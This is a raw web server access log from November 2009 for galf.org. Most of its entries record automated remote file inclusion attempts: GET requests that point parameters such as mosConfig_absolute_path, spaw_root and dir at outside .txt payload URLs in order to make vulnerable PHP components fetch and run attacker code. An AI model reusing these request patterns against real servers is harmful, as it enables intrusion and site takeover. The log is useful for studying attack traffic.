75.126.218.14 - - [01/Nov/2009:23:03:17 -0800] "GET /logs/access_090928.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:03:21 -0800] "GET /logs/access_090406.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:03:26 -0800] "GET /logs/access_090525.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:03:30 -0800] "GET /logs/access_090316.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:03:30 -0800] "GET /logs/access_090511.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:03:34 -0800] "GET /logs/access_090622.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:03:34 -0800] "GET /logs/access_090824.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:03:34 -0800] "GET /logs/access_090921.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:03:38 -0800] "GET /logs/access_090323.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:03:38 -0800] "GET /logs/access_090420.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:03:38 -0800] "GET /skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
75.126.218.14 - - [01/Nov/2009:23:03:38 -0800] "GET /logs/access_090629.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:03:38 -0800] "GET /logs/access.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
75.126.218.14 - - [01/Nov/2009:23:03:38 -0800] "GET /logs//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
75.126.218.14 - - [01/Nov/2009:23:05:32 -0800] "GET /logs/access_090406.log//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:06:53 -0800] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:06:53 -0800] "GET /logs/access.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:06:54 -0800] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:23:11:06 -0800] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:23:11:06 -0800] "GET /logs/access.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:23:11:06 -0800] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:23:11:08 -0800] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:23:11:08 -0800] "GET /logs/access.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:23:11:08 -0800] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:11:43 -0800] "GET /logs/access.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:11:44 -0800] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:11:44 -0800] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:12:04 -0800] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:12:07 -0800] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:12:07 -0800] "GET /logs/access.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:23:13:28 -0800] "GET /logs/access_090427.log/?mosConfig_absol/index.p//bbs//skin/zero_vote/write.php?p=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:23:13:28 -0800] "GET /logs/?mosConfig_absol/index.p//bbs//skin/zero_vote/write.php?p=http://n34.biz/id1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:23:13:28 -0800] "GET /?mosConfig_absol/index.p//bbs//skin/zero_vote/write.php?p=http://n34.biz/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:23:13:47 -0800] "GET /logs/access_090427.log/?mosConfig_absol/index.p//bbs//skin/zero_vote/write.php?p=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:23:13:47 -0800] "GET /?mosConfig_absol/index.p//bbs//skin/zero_vote/write.php?p=http://n34.biz/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:23:13:47 -0800] "GET /logs/?mosConfig_absol/index.p//bbs//skin/zero_vote/write.php?p=http://n34.biz/id1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:23:13:53 -0800] "GET /logs/access_091012.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:23:13:57 -0800] "GET /logs/access_090504.log/?mosConfig_absol/index.p//bbs//skin/zero_vote/write.php?p=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:23:14:06 -0800] "GET /logs/access_091012.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:23:14:32 -0800] "GET /logs/access_090420.log/?mosConfig_absol/index.p//bbs//skin/zero_vote/write.php?p=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [01/Nov/2009:23:14:42 -0800] "GET /logs/access_090420.log/?mosConfig_absol/index.p//bbs//skin/zero_vote/write.php?p=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:23:14:49 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:23:14:49 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:23:14:49 -0800] "GET /logs/access_091012.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:23:14:52 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:23:14:52 -0800] "GET /logs/access_091012.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:23:14:52 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:23:15:05 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [01/Nov/2009:23:15:05 -0800] "GET /logs/access.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [01/Nov/2009:23:15:05 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [01/Nov/2009:23:15:16 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [01/Nov/2009:23:15:16 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [01/Nov/2009:23:15:16 -0800] "GET /logs/access.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:15:33 -0800] "GET /logs/access_091012.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:18:41 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:18:41 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:18:42 -0800] "GET /logs/access_091012.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:19:39 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:19:39 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:19:40 -0800] "GET /logs/access_091012.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:19:51 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:19:51 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:19:52 -0800] "GET /logs/access_091012.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:20:01 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:20:02 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:20:03 -0800] "GET /logs/access.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:20:47 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:20:47 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:20:48 -0800] "GET /logs/access.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:21:05 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:21:05 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:21:07 -0800] "GET /logs/access.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:21:23 -0800] "GET /logs/access_091012.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.247.164.121 - - [01/Nov/2009:23:23:20 -0800] "GET /logs/nav.php?pagina=http://www.medisite.fr/id???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
80.247.164.121 - - [01/Nov/2009:23:23:20 -0800] "GET /nav.php?pagina=http://www.medisite.fr/id???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
65.55.209.191 - - [01/Nov/2009:23:23:21 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.191 - - [01/Nov/2009:23:23:22 -0800] "GET /cendoc/?M=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:23:59 -0800] "GET /logs/access_091012.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:23:25:25 -0800] "GET /logs//login.php?dir=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.163.197.88 - - [01/Nov/2009:23:25:26 -0800] "GET /login.php?dir=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.163.197.88 - - [01/Nov/2009:23:25:27 -0800] "GET /logs/access.log%20%20//login.php?dir=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.6.163.20 - - [01/Nov/2009:23:25:50 -0800] "GET /logs/access.log HTTP/1.1" 200 217855 "-" "Mozilla/8.0" "www.galf.org"
61.6.163.20 - - [01/Nov/2009:23:26:13 -0800] "GET /logs/access.log HTTP/1.1" 200 217976 "-" "Mozilla/8.0" "www.galf.org"
61.6.163.20 - - [01/Nov/2009:23:27:10 -0800] "GET /logs/access.log HTTP/1.1" 200 218097 "-" "Mozilla/8.0" "www.galf.org"
61.6.163.21 - - [01/Nov/2009:23:28:05 -0800] "GET /logs/access.log HTTP/1.0" 200 218218 "-" "Mozilla/8.0" "www.galf.org"
93.190.49.3 - - [01/Nov/2009:23:33:45 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hotelgiglio.info/galleria/content/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
93.190.49.3 - - [01/Nov/2009:23:33:45 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hotelgiglio.info/galleria/content/test.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
58.103.125.14 - - [01/Nov/2009:23:35:14 -0800] "GET /logs/access_090817.log//setup.php?dir=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.103.125.14 - - [01/Nov/2009:23:35:14 -0800] "GET /setup.php?dir=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.103.125.14 - - [01/Nov/2009:23:35:14 -0800] "GET /logs//setup.php?dir=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.103.125.14 - - [01/Nov/2009:23:36:03 -0800] "GET /logs/access_090907.log//setup.php?dir=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.247.164.121 - - [01/Nov/2009:23:36:42 -0800] "GET /logs/index2.php?pg=http://www.medisite.fr/id???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
80.247.164.121 - - [01/Nov/2009:23:36:42 -0800] "GET /index2.php?pg=http://www.medisite.fr/id???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:23:37:21 -0800] "GET /logs/access_090316.log//secure.php?&cfgProgDir=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:23:37:21 -0800] "GET /logs//secure.php?&cfgProgDir=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:23:37:21 -0800] "GET /secure.php?&cfgProgDir=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:23:38:38 -0800] "GET /scanhttp://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:23:38:44 -0800] "GET /logs/access_090608.log/scanhttp://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:23:38:44 -0800] "GET /scanhttp://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
93.190.49.3 - - [01/Nov/2009:23:38:51 -0800] "GET /setup.php?setup[use_category]=1&dir=http://www.hotelgiglio.info/galleria/content/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
93.190.49.3 - - [01/Nov/2009:23:38:51 -0800] "GET /logs/setup.php?setup[use_category]=1&dir=http://www.hotelgiglio.info/galleria/content/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:23:38:52 -0800] "GET /logs/access_090803.log/scanhttp://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:23:39:37 -0800] "GET /logs/access_090608.log/scanhttp://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:23:39:37 -0800] "GET /scanhttp://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:23:39:37 -0800] "GET /logs/scanhttp://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:23:40:04 -0800] "GET /logs/access_090803.log/scanhttp://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:40:08 -0800] "GET /skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:40:08 -0800] "GET /logs//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:40:09 -0800] "GET /logs/access_090504.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:40:26 -0800] "GET /logs/access_090518.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:40:55 -0800] "GET /logs/access_090713.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:41:07 -0800] "GET /logs//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:41:07 -0800] "GET /logs/access_090504.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:23:41:08 -0800] "GET /logs/access.log//login.php?dir=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [01/Nov/2009:23:41:08 -0800] "GET /skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:41:21 -0800] "GET /logs/access_090330.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:41:22 -0800] "GET /logs/access_090727.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:23:41:25 -0800] "GET /logs/access_090518.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
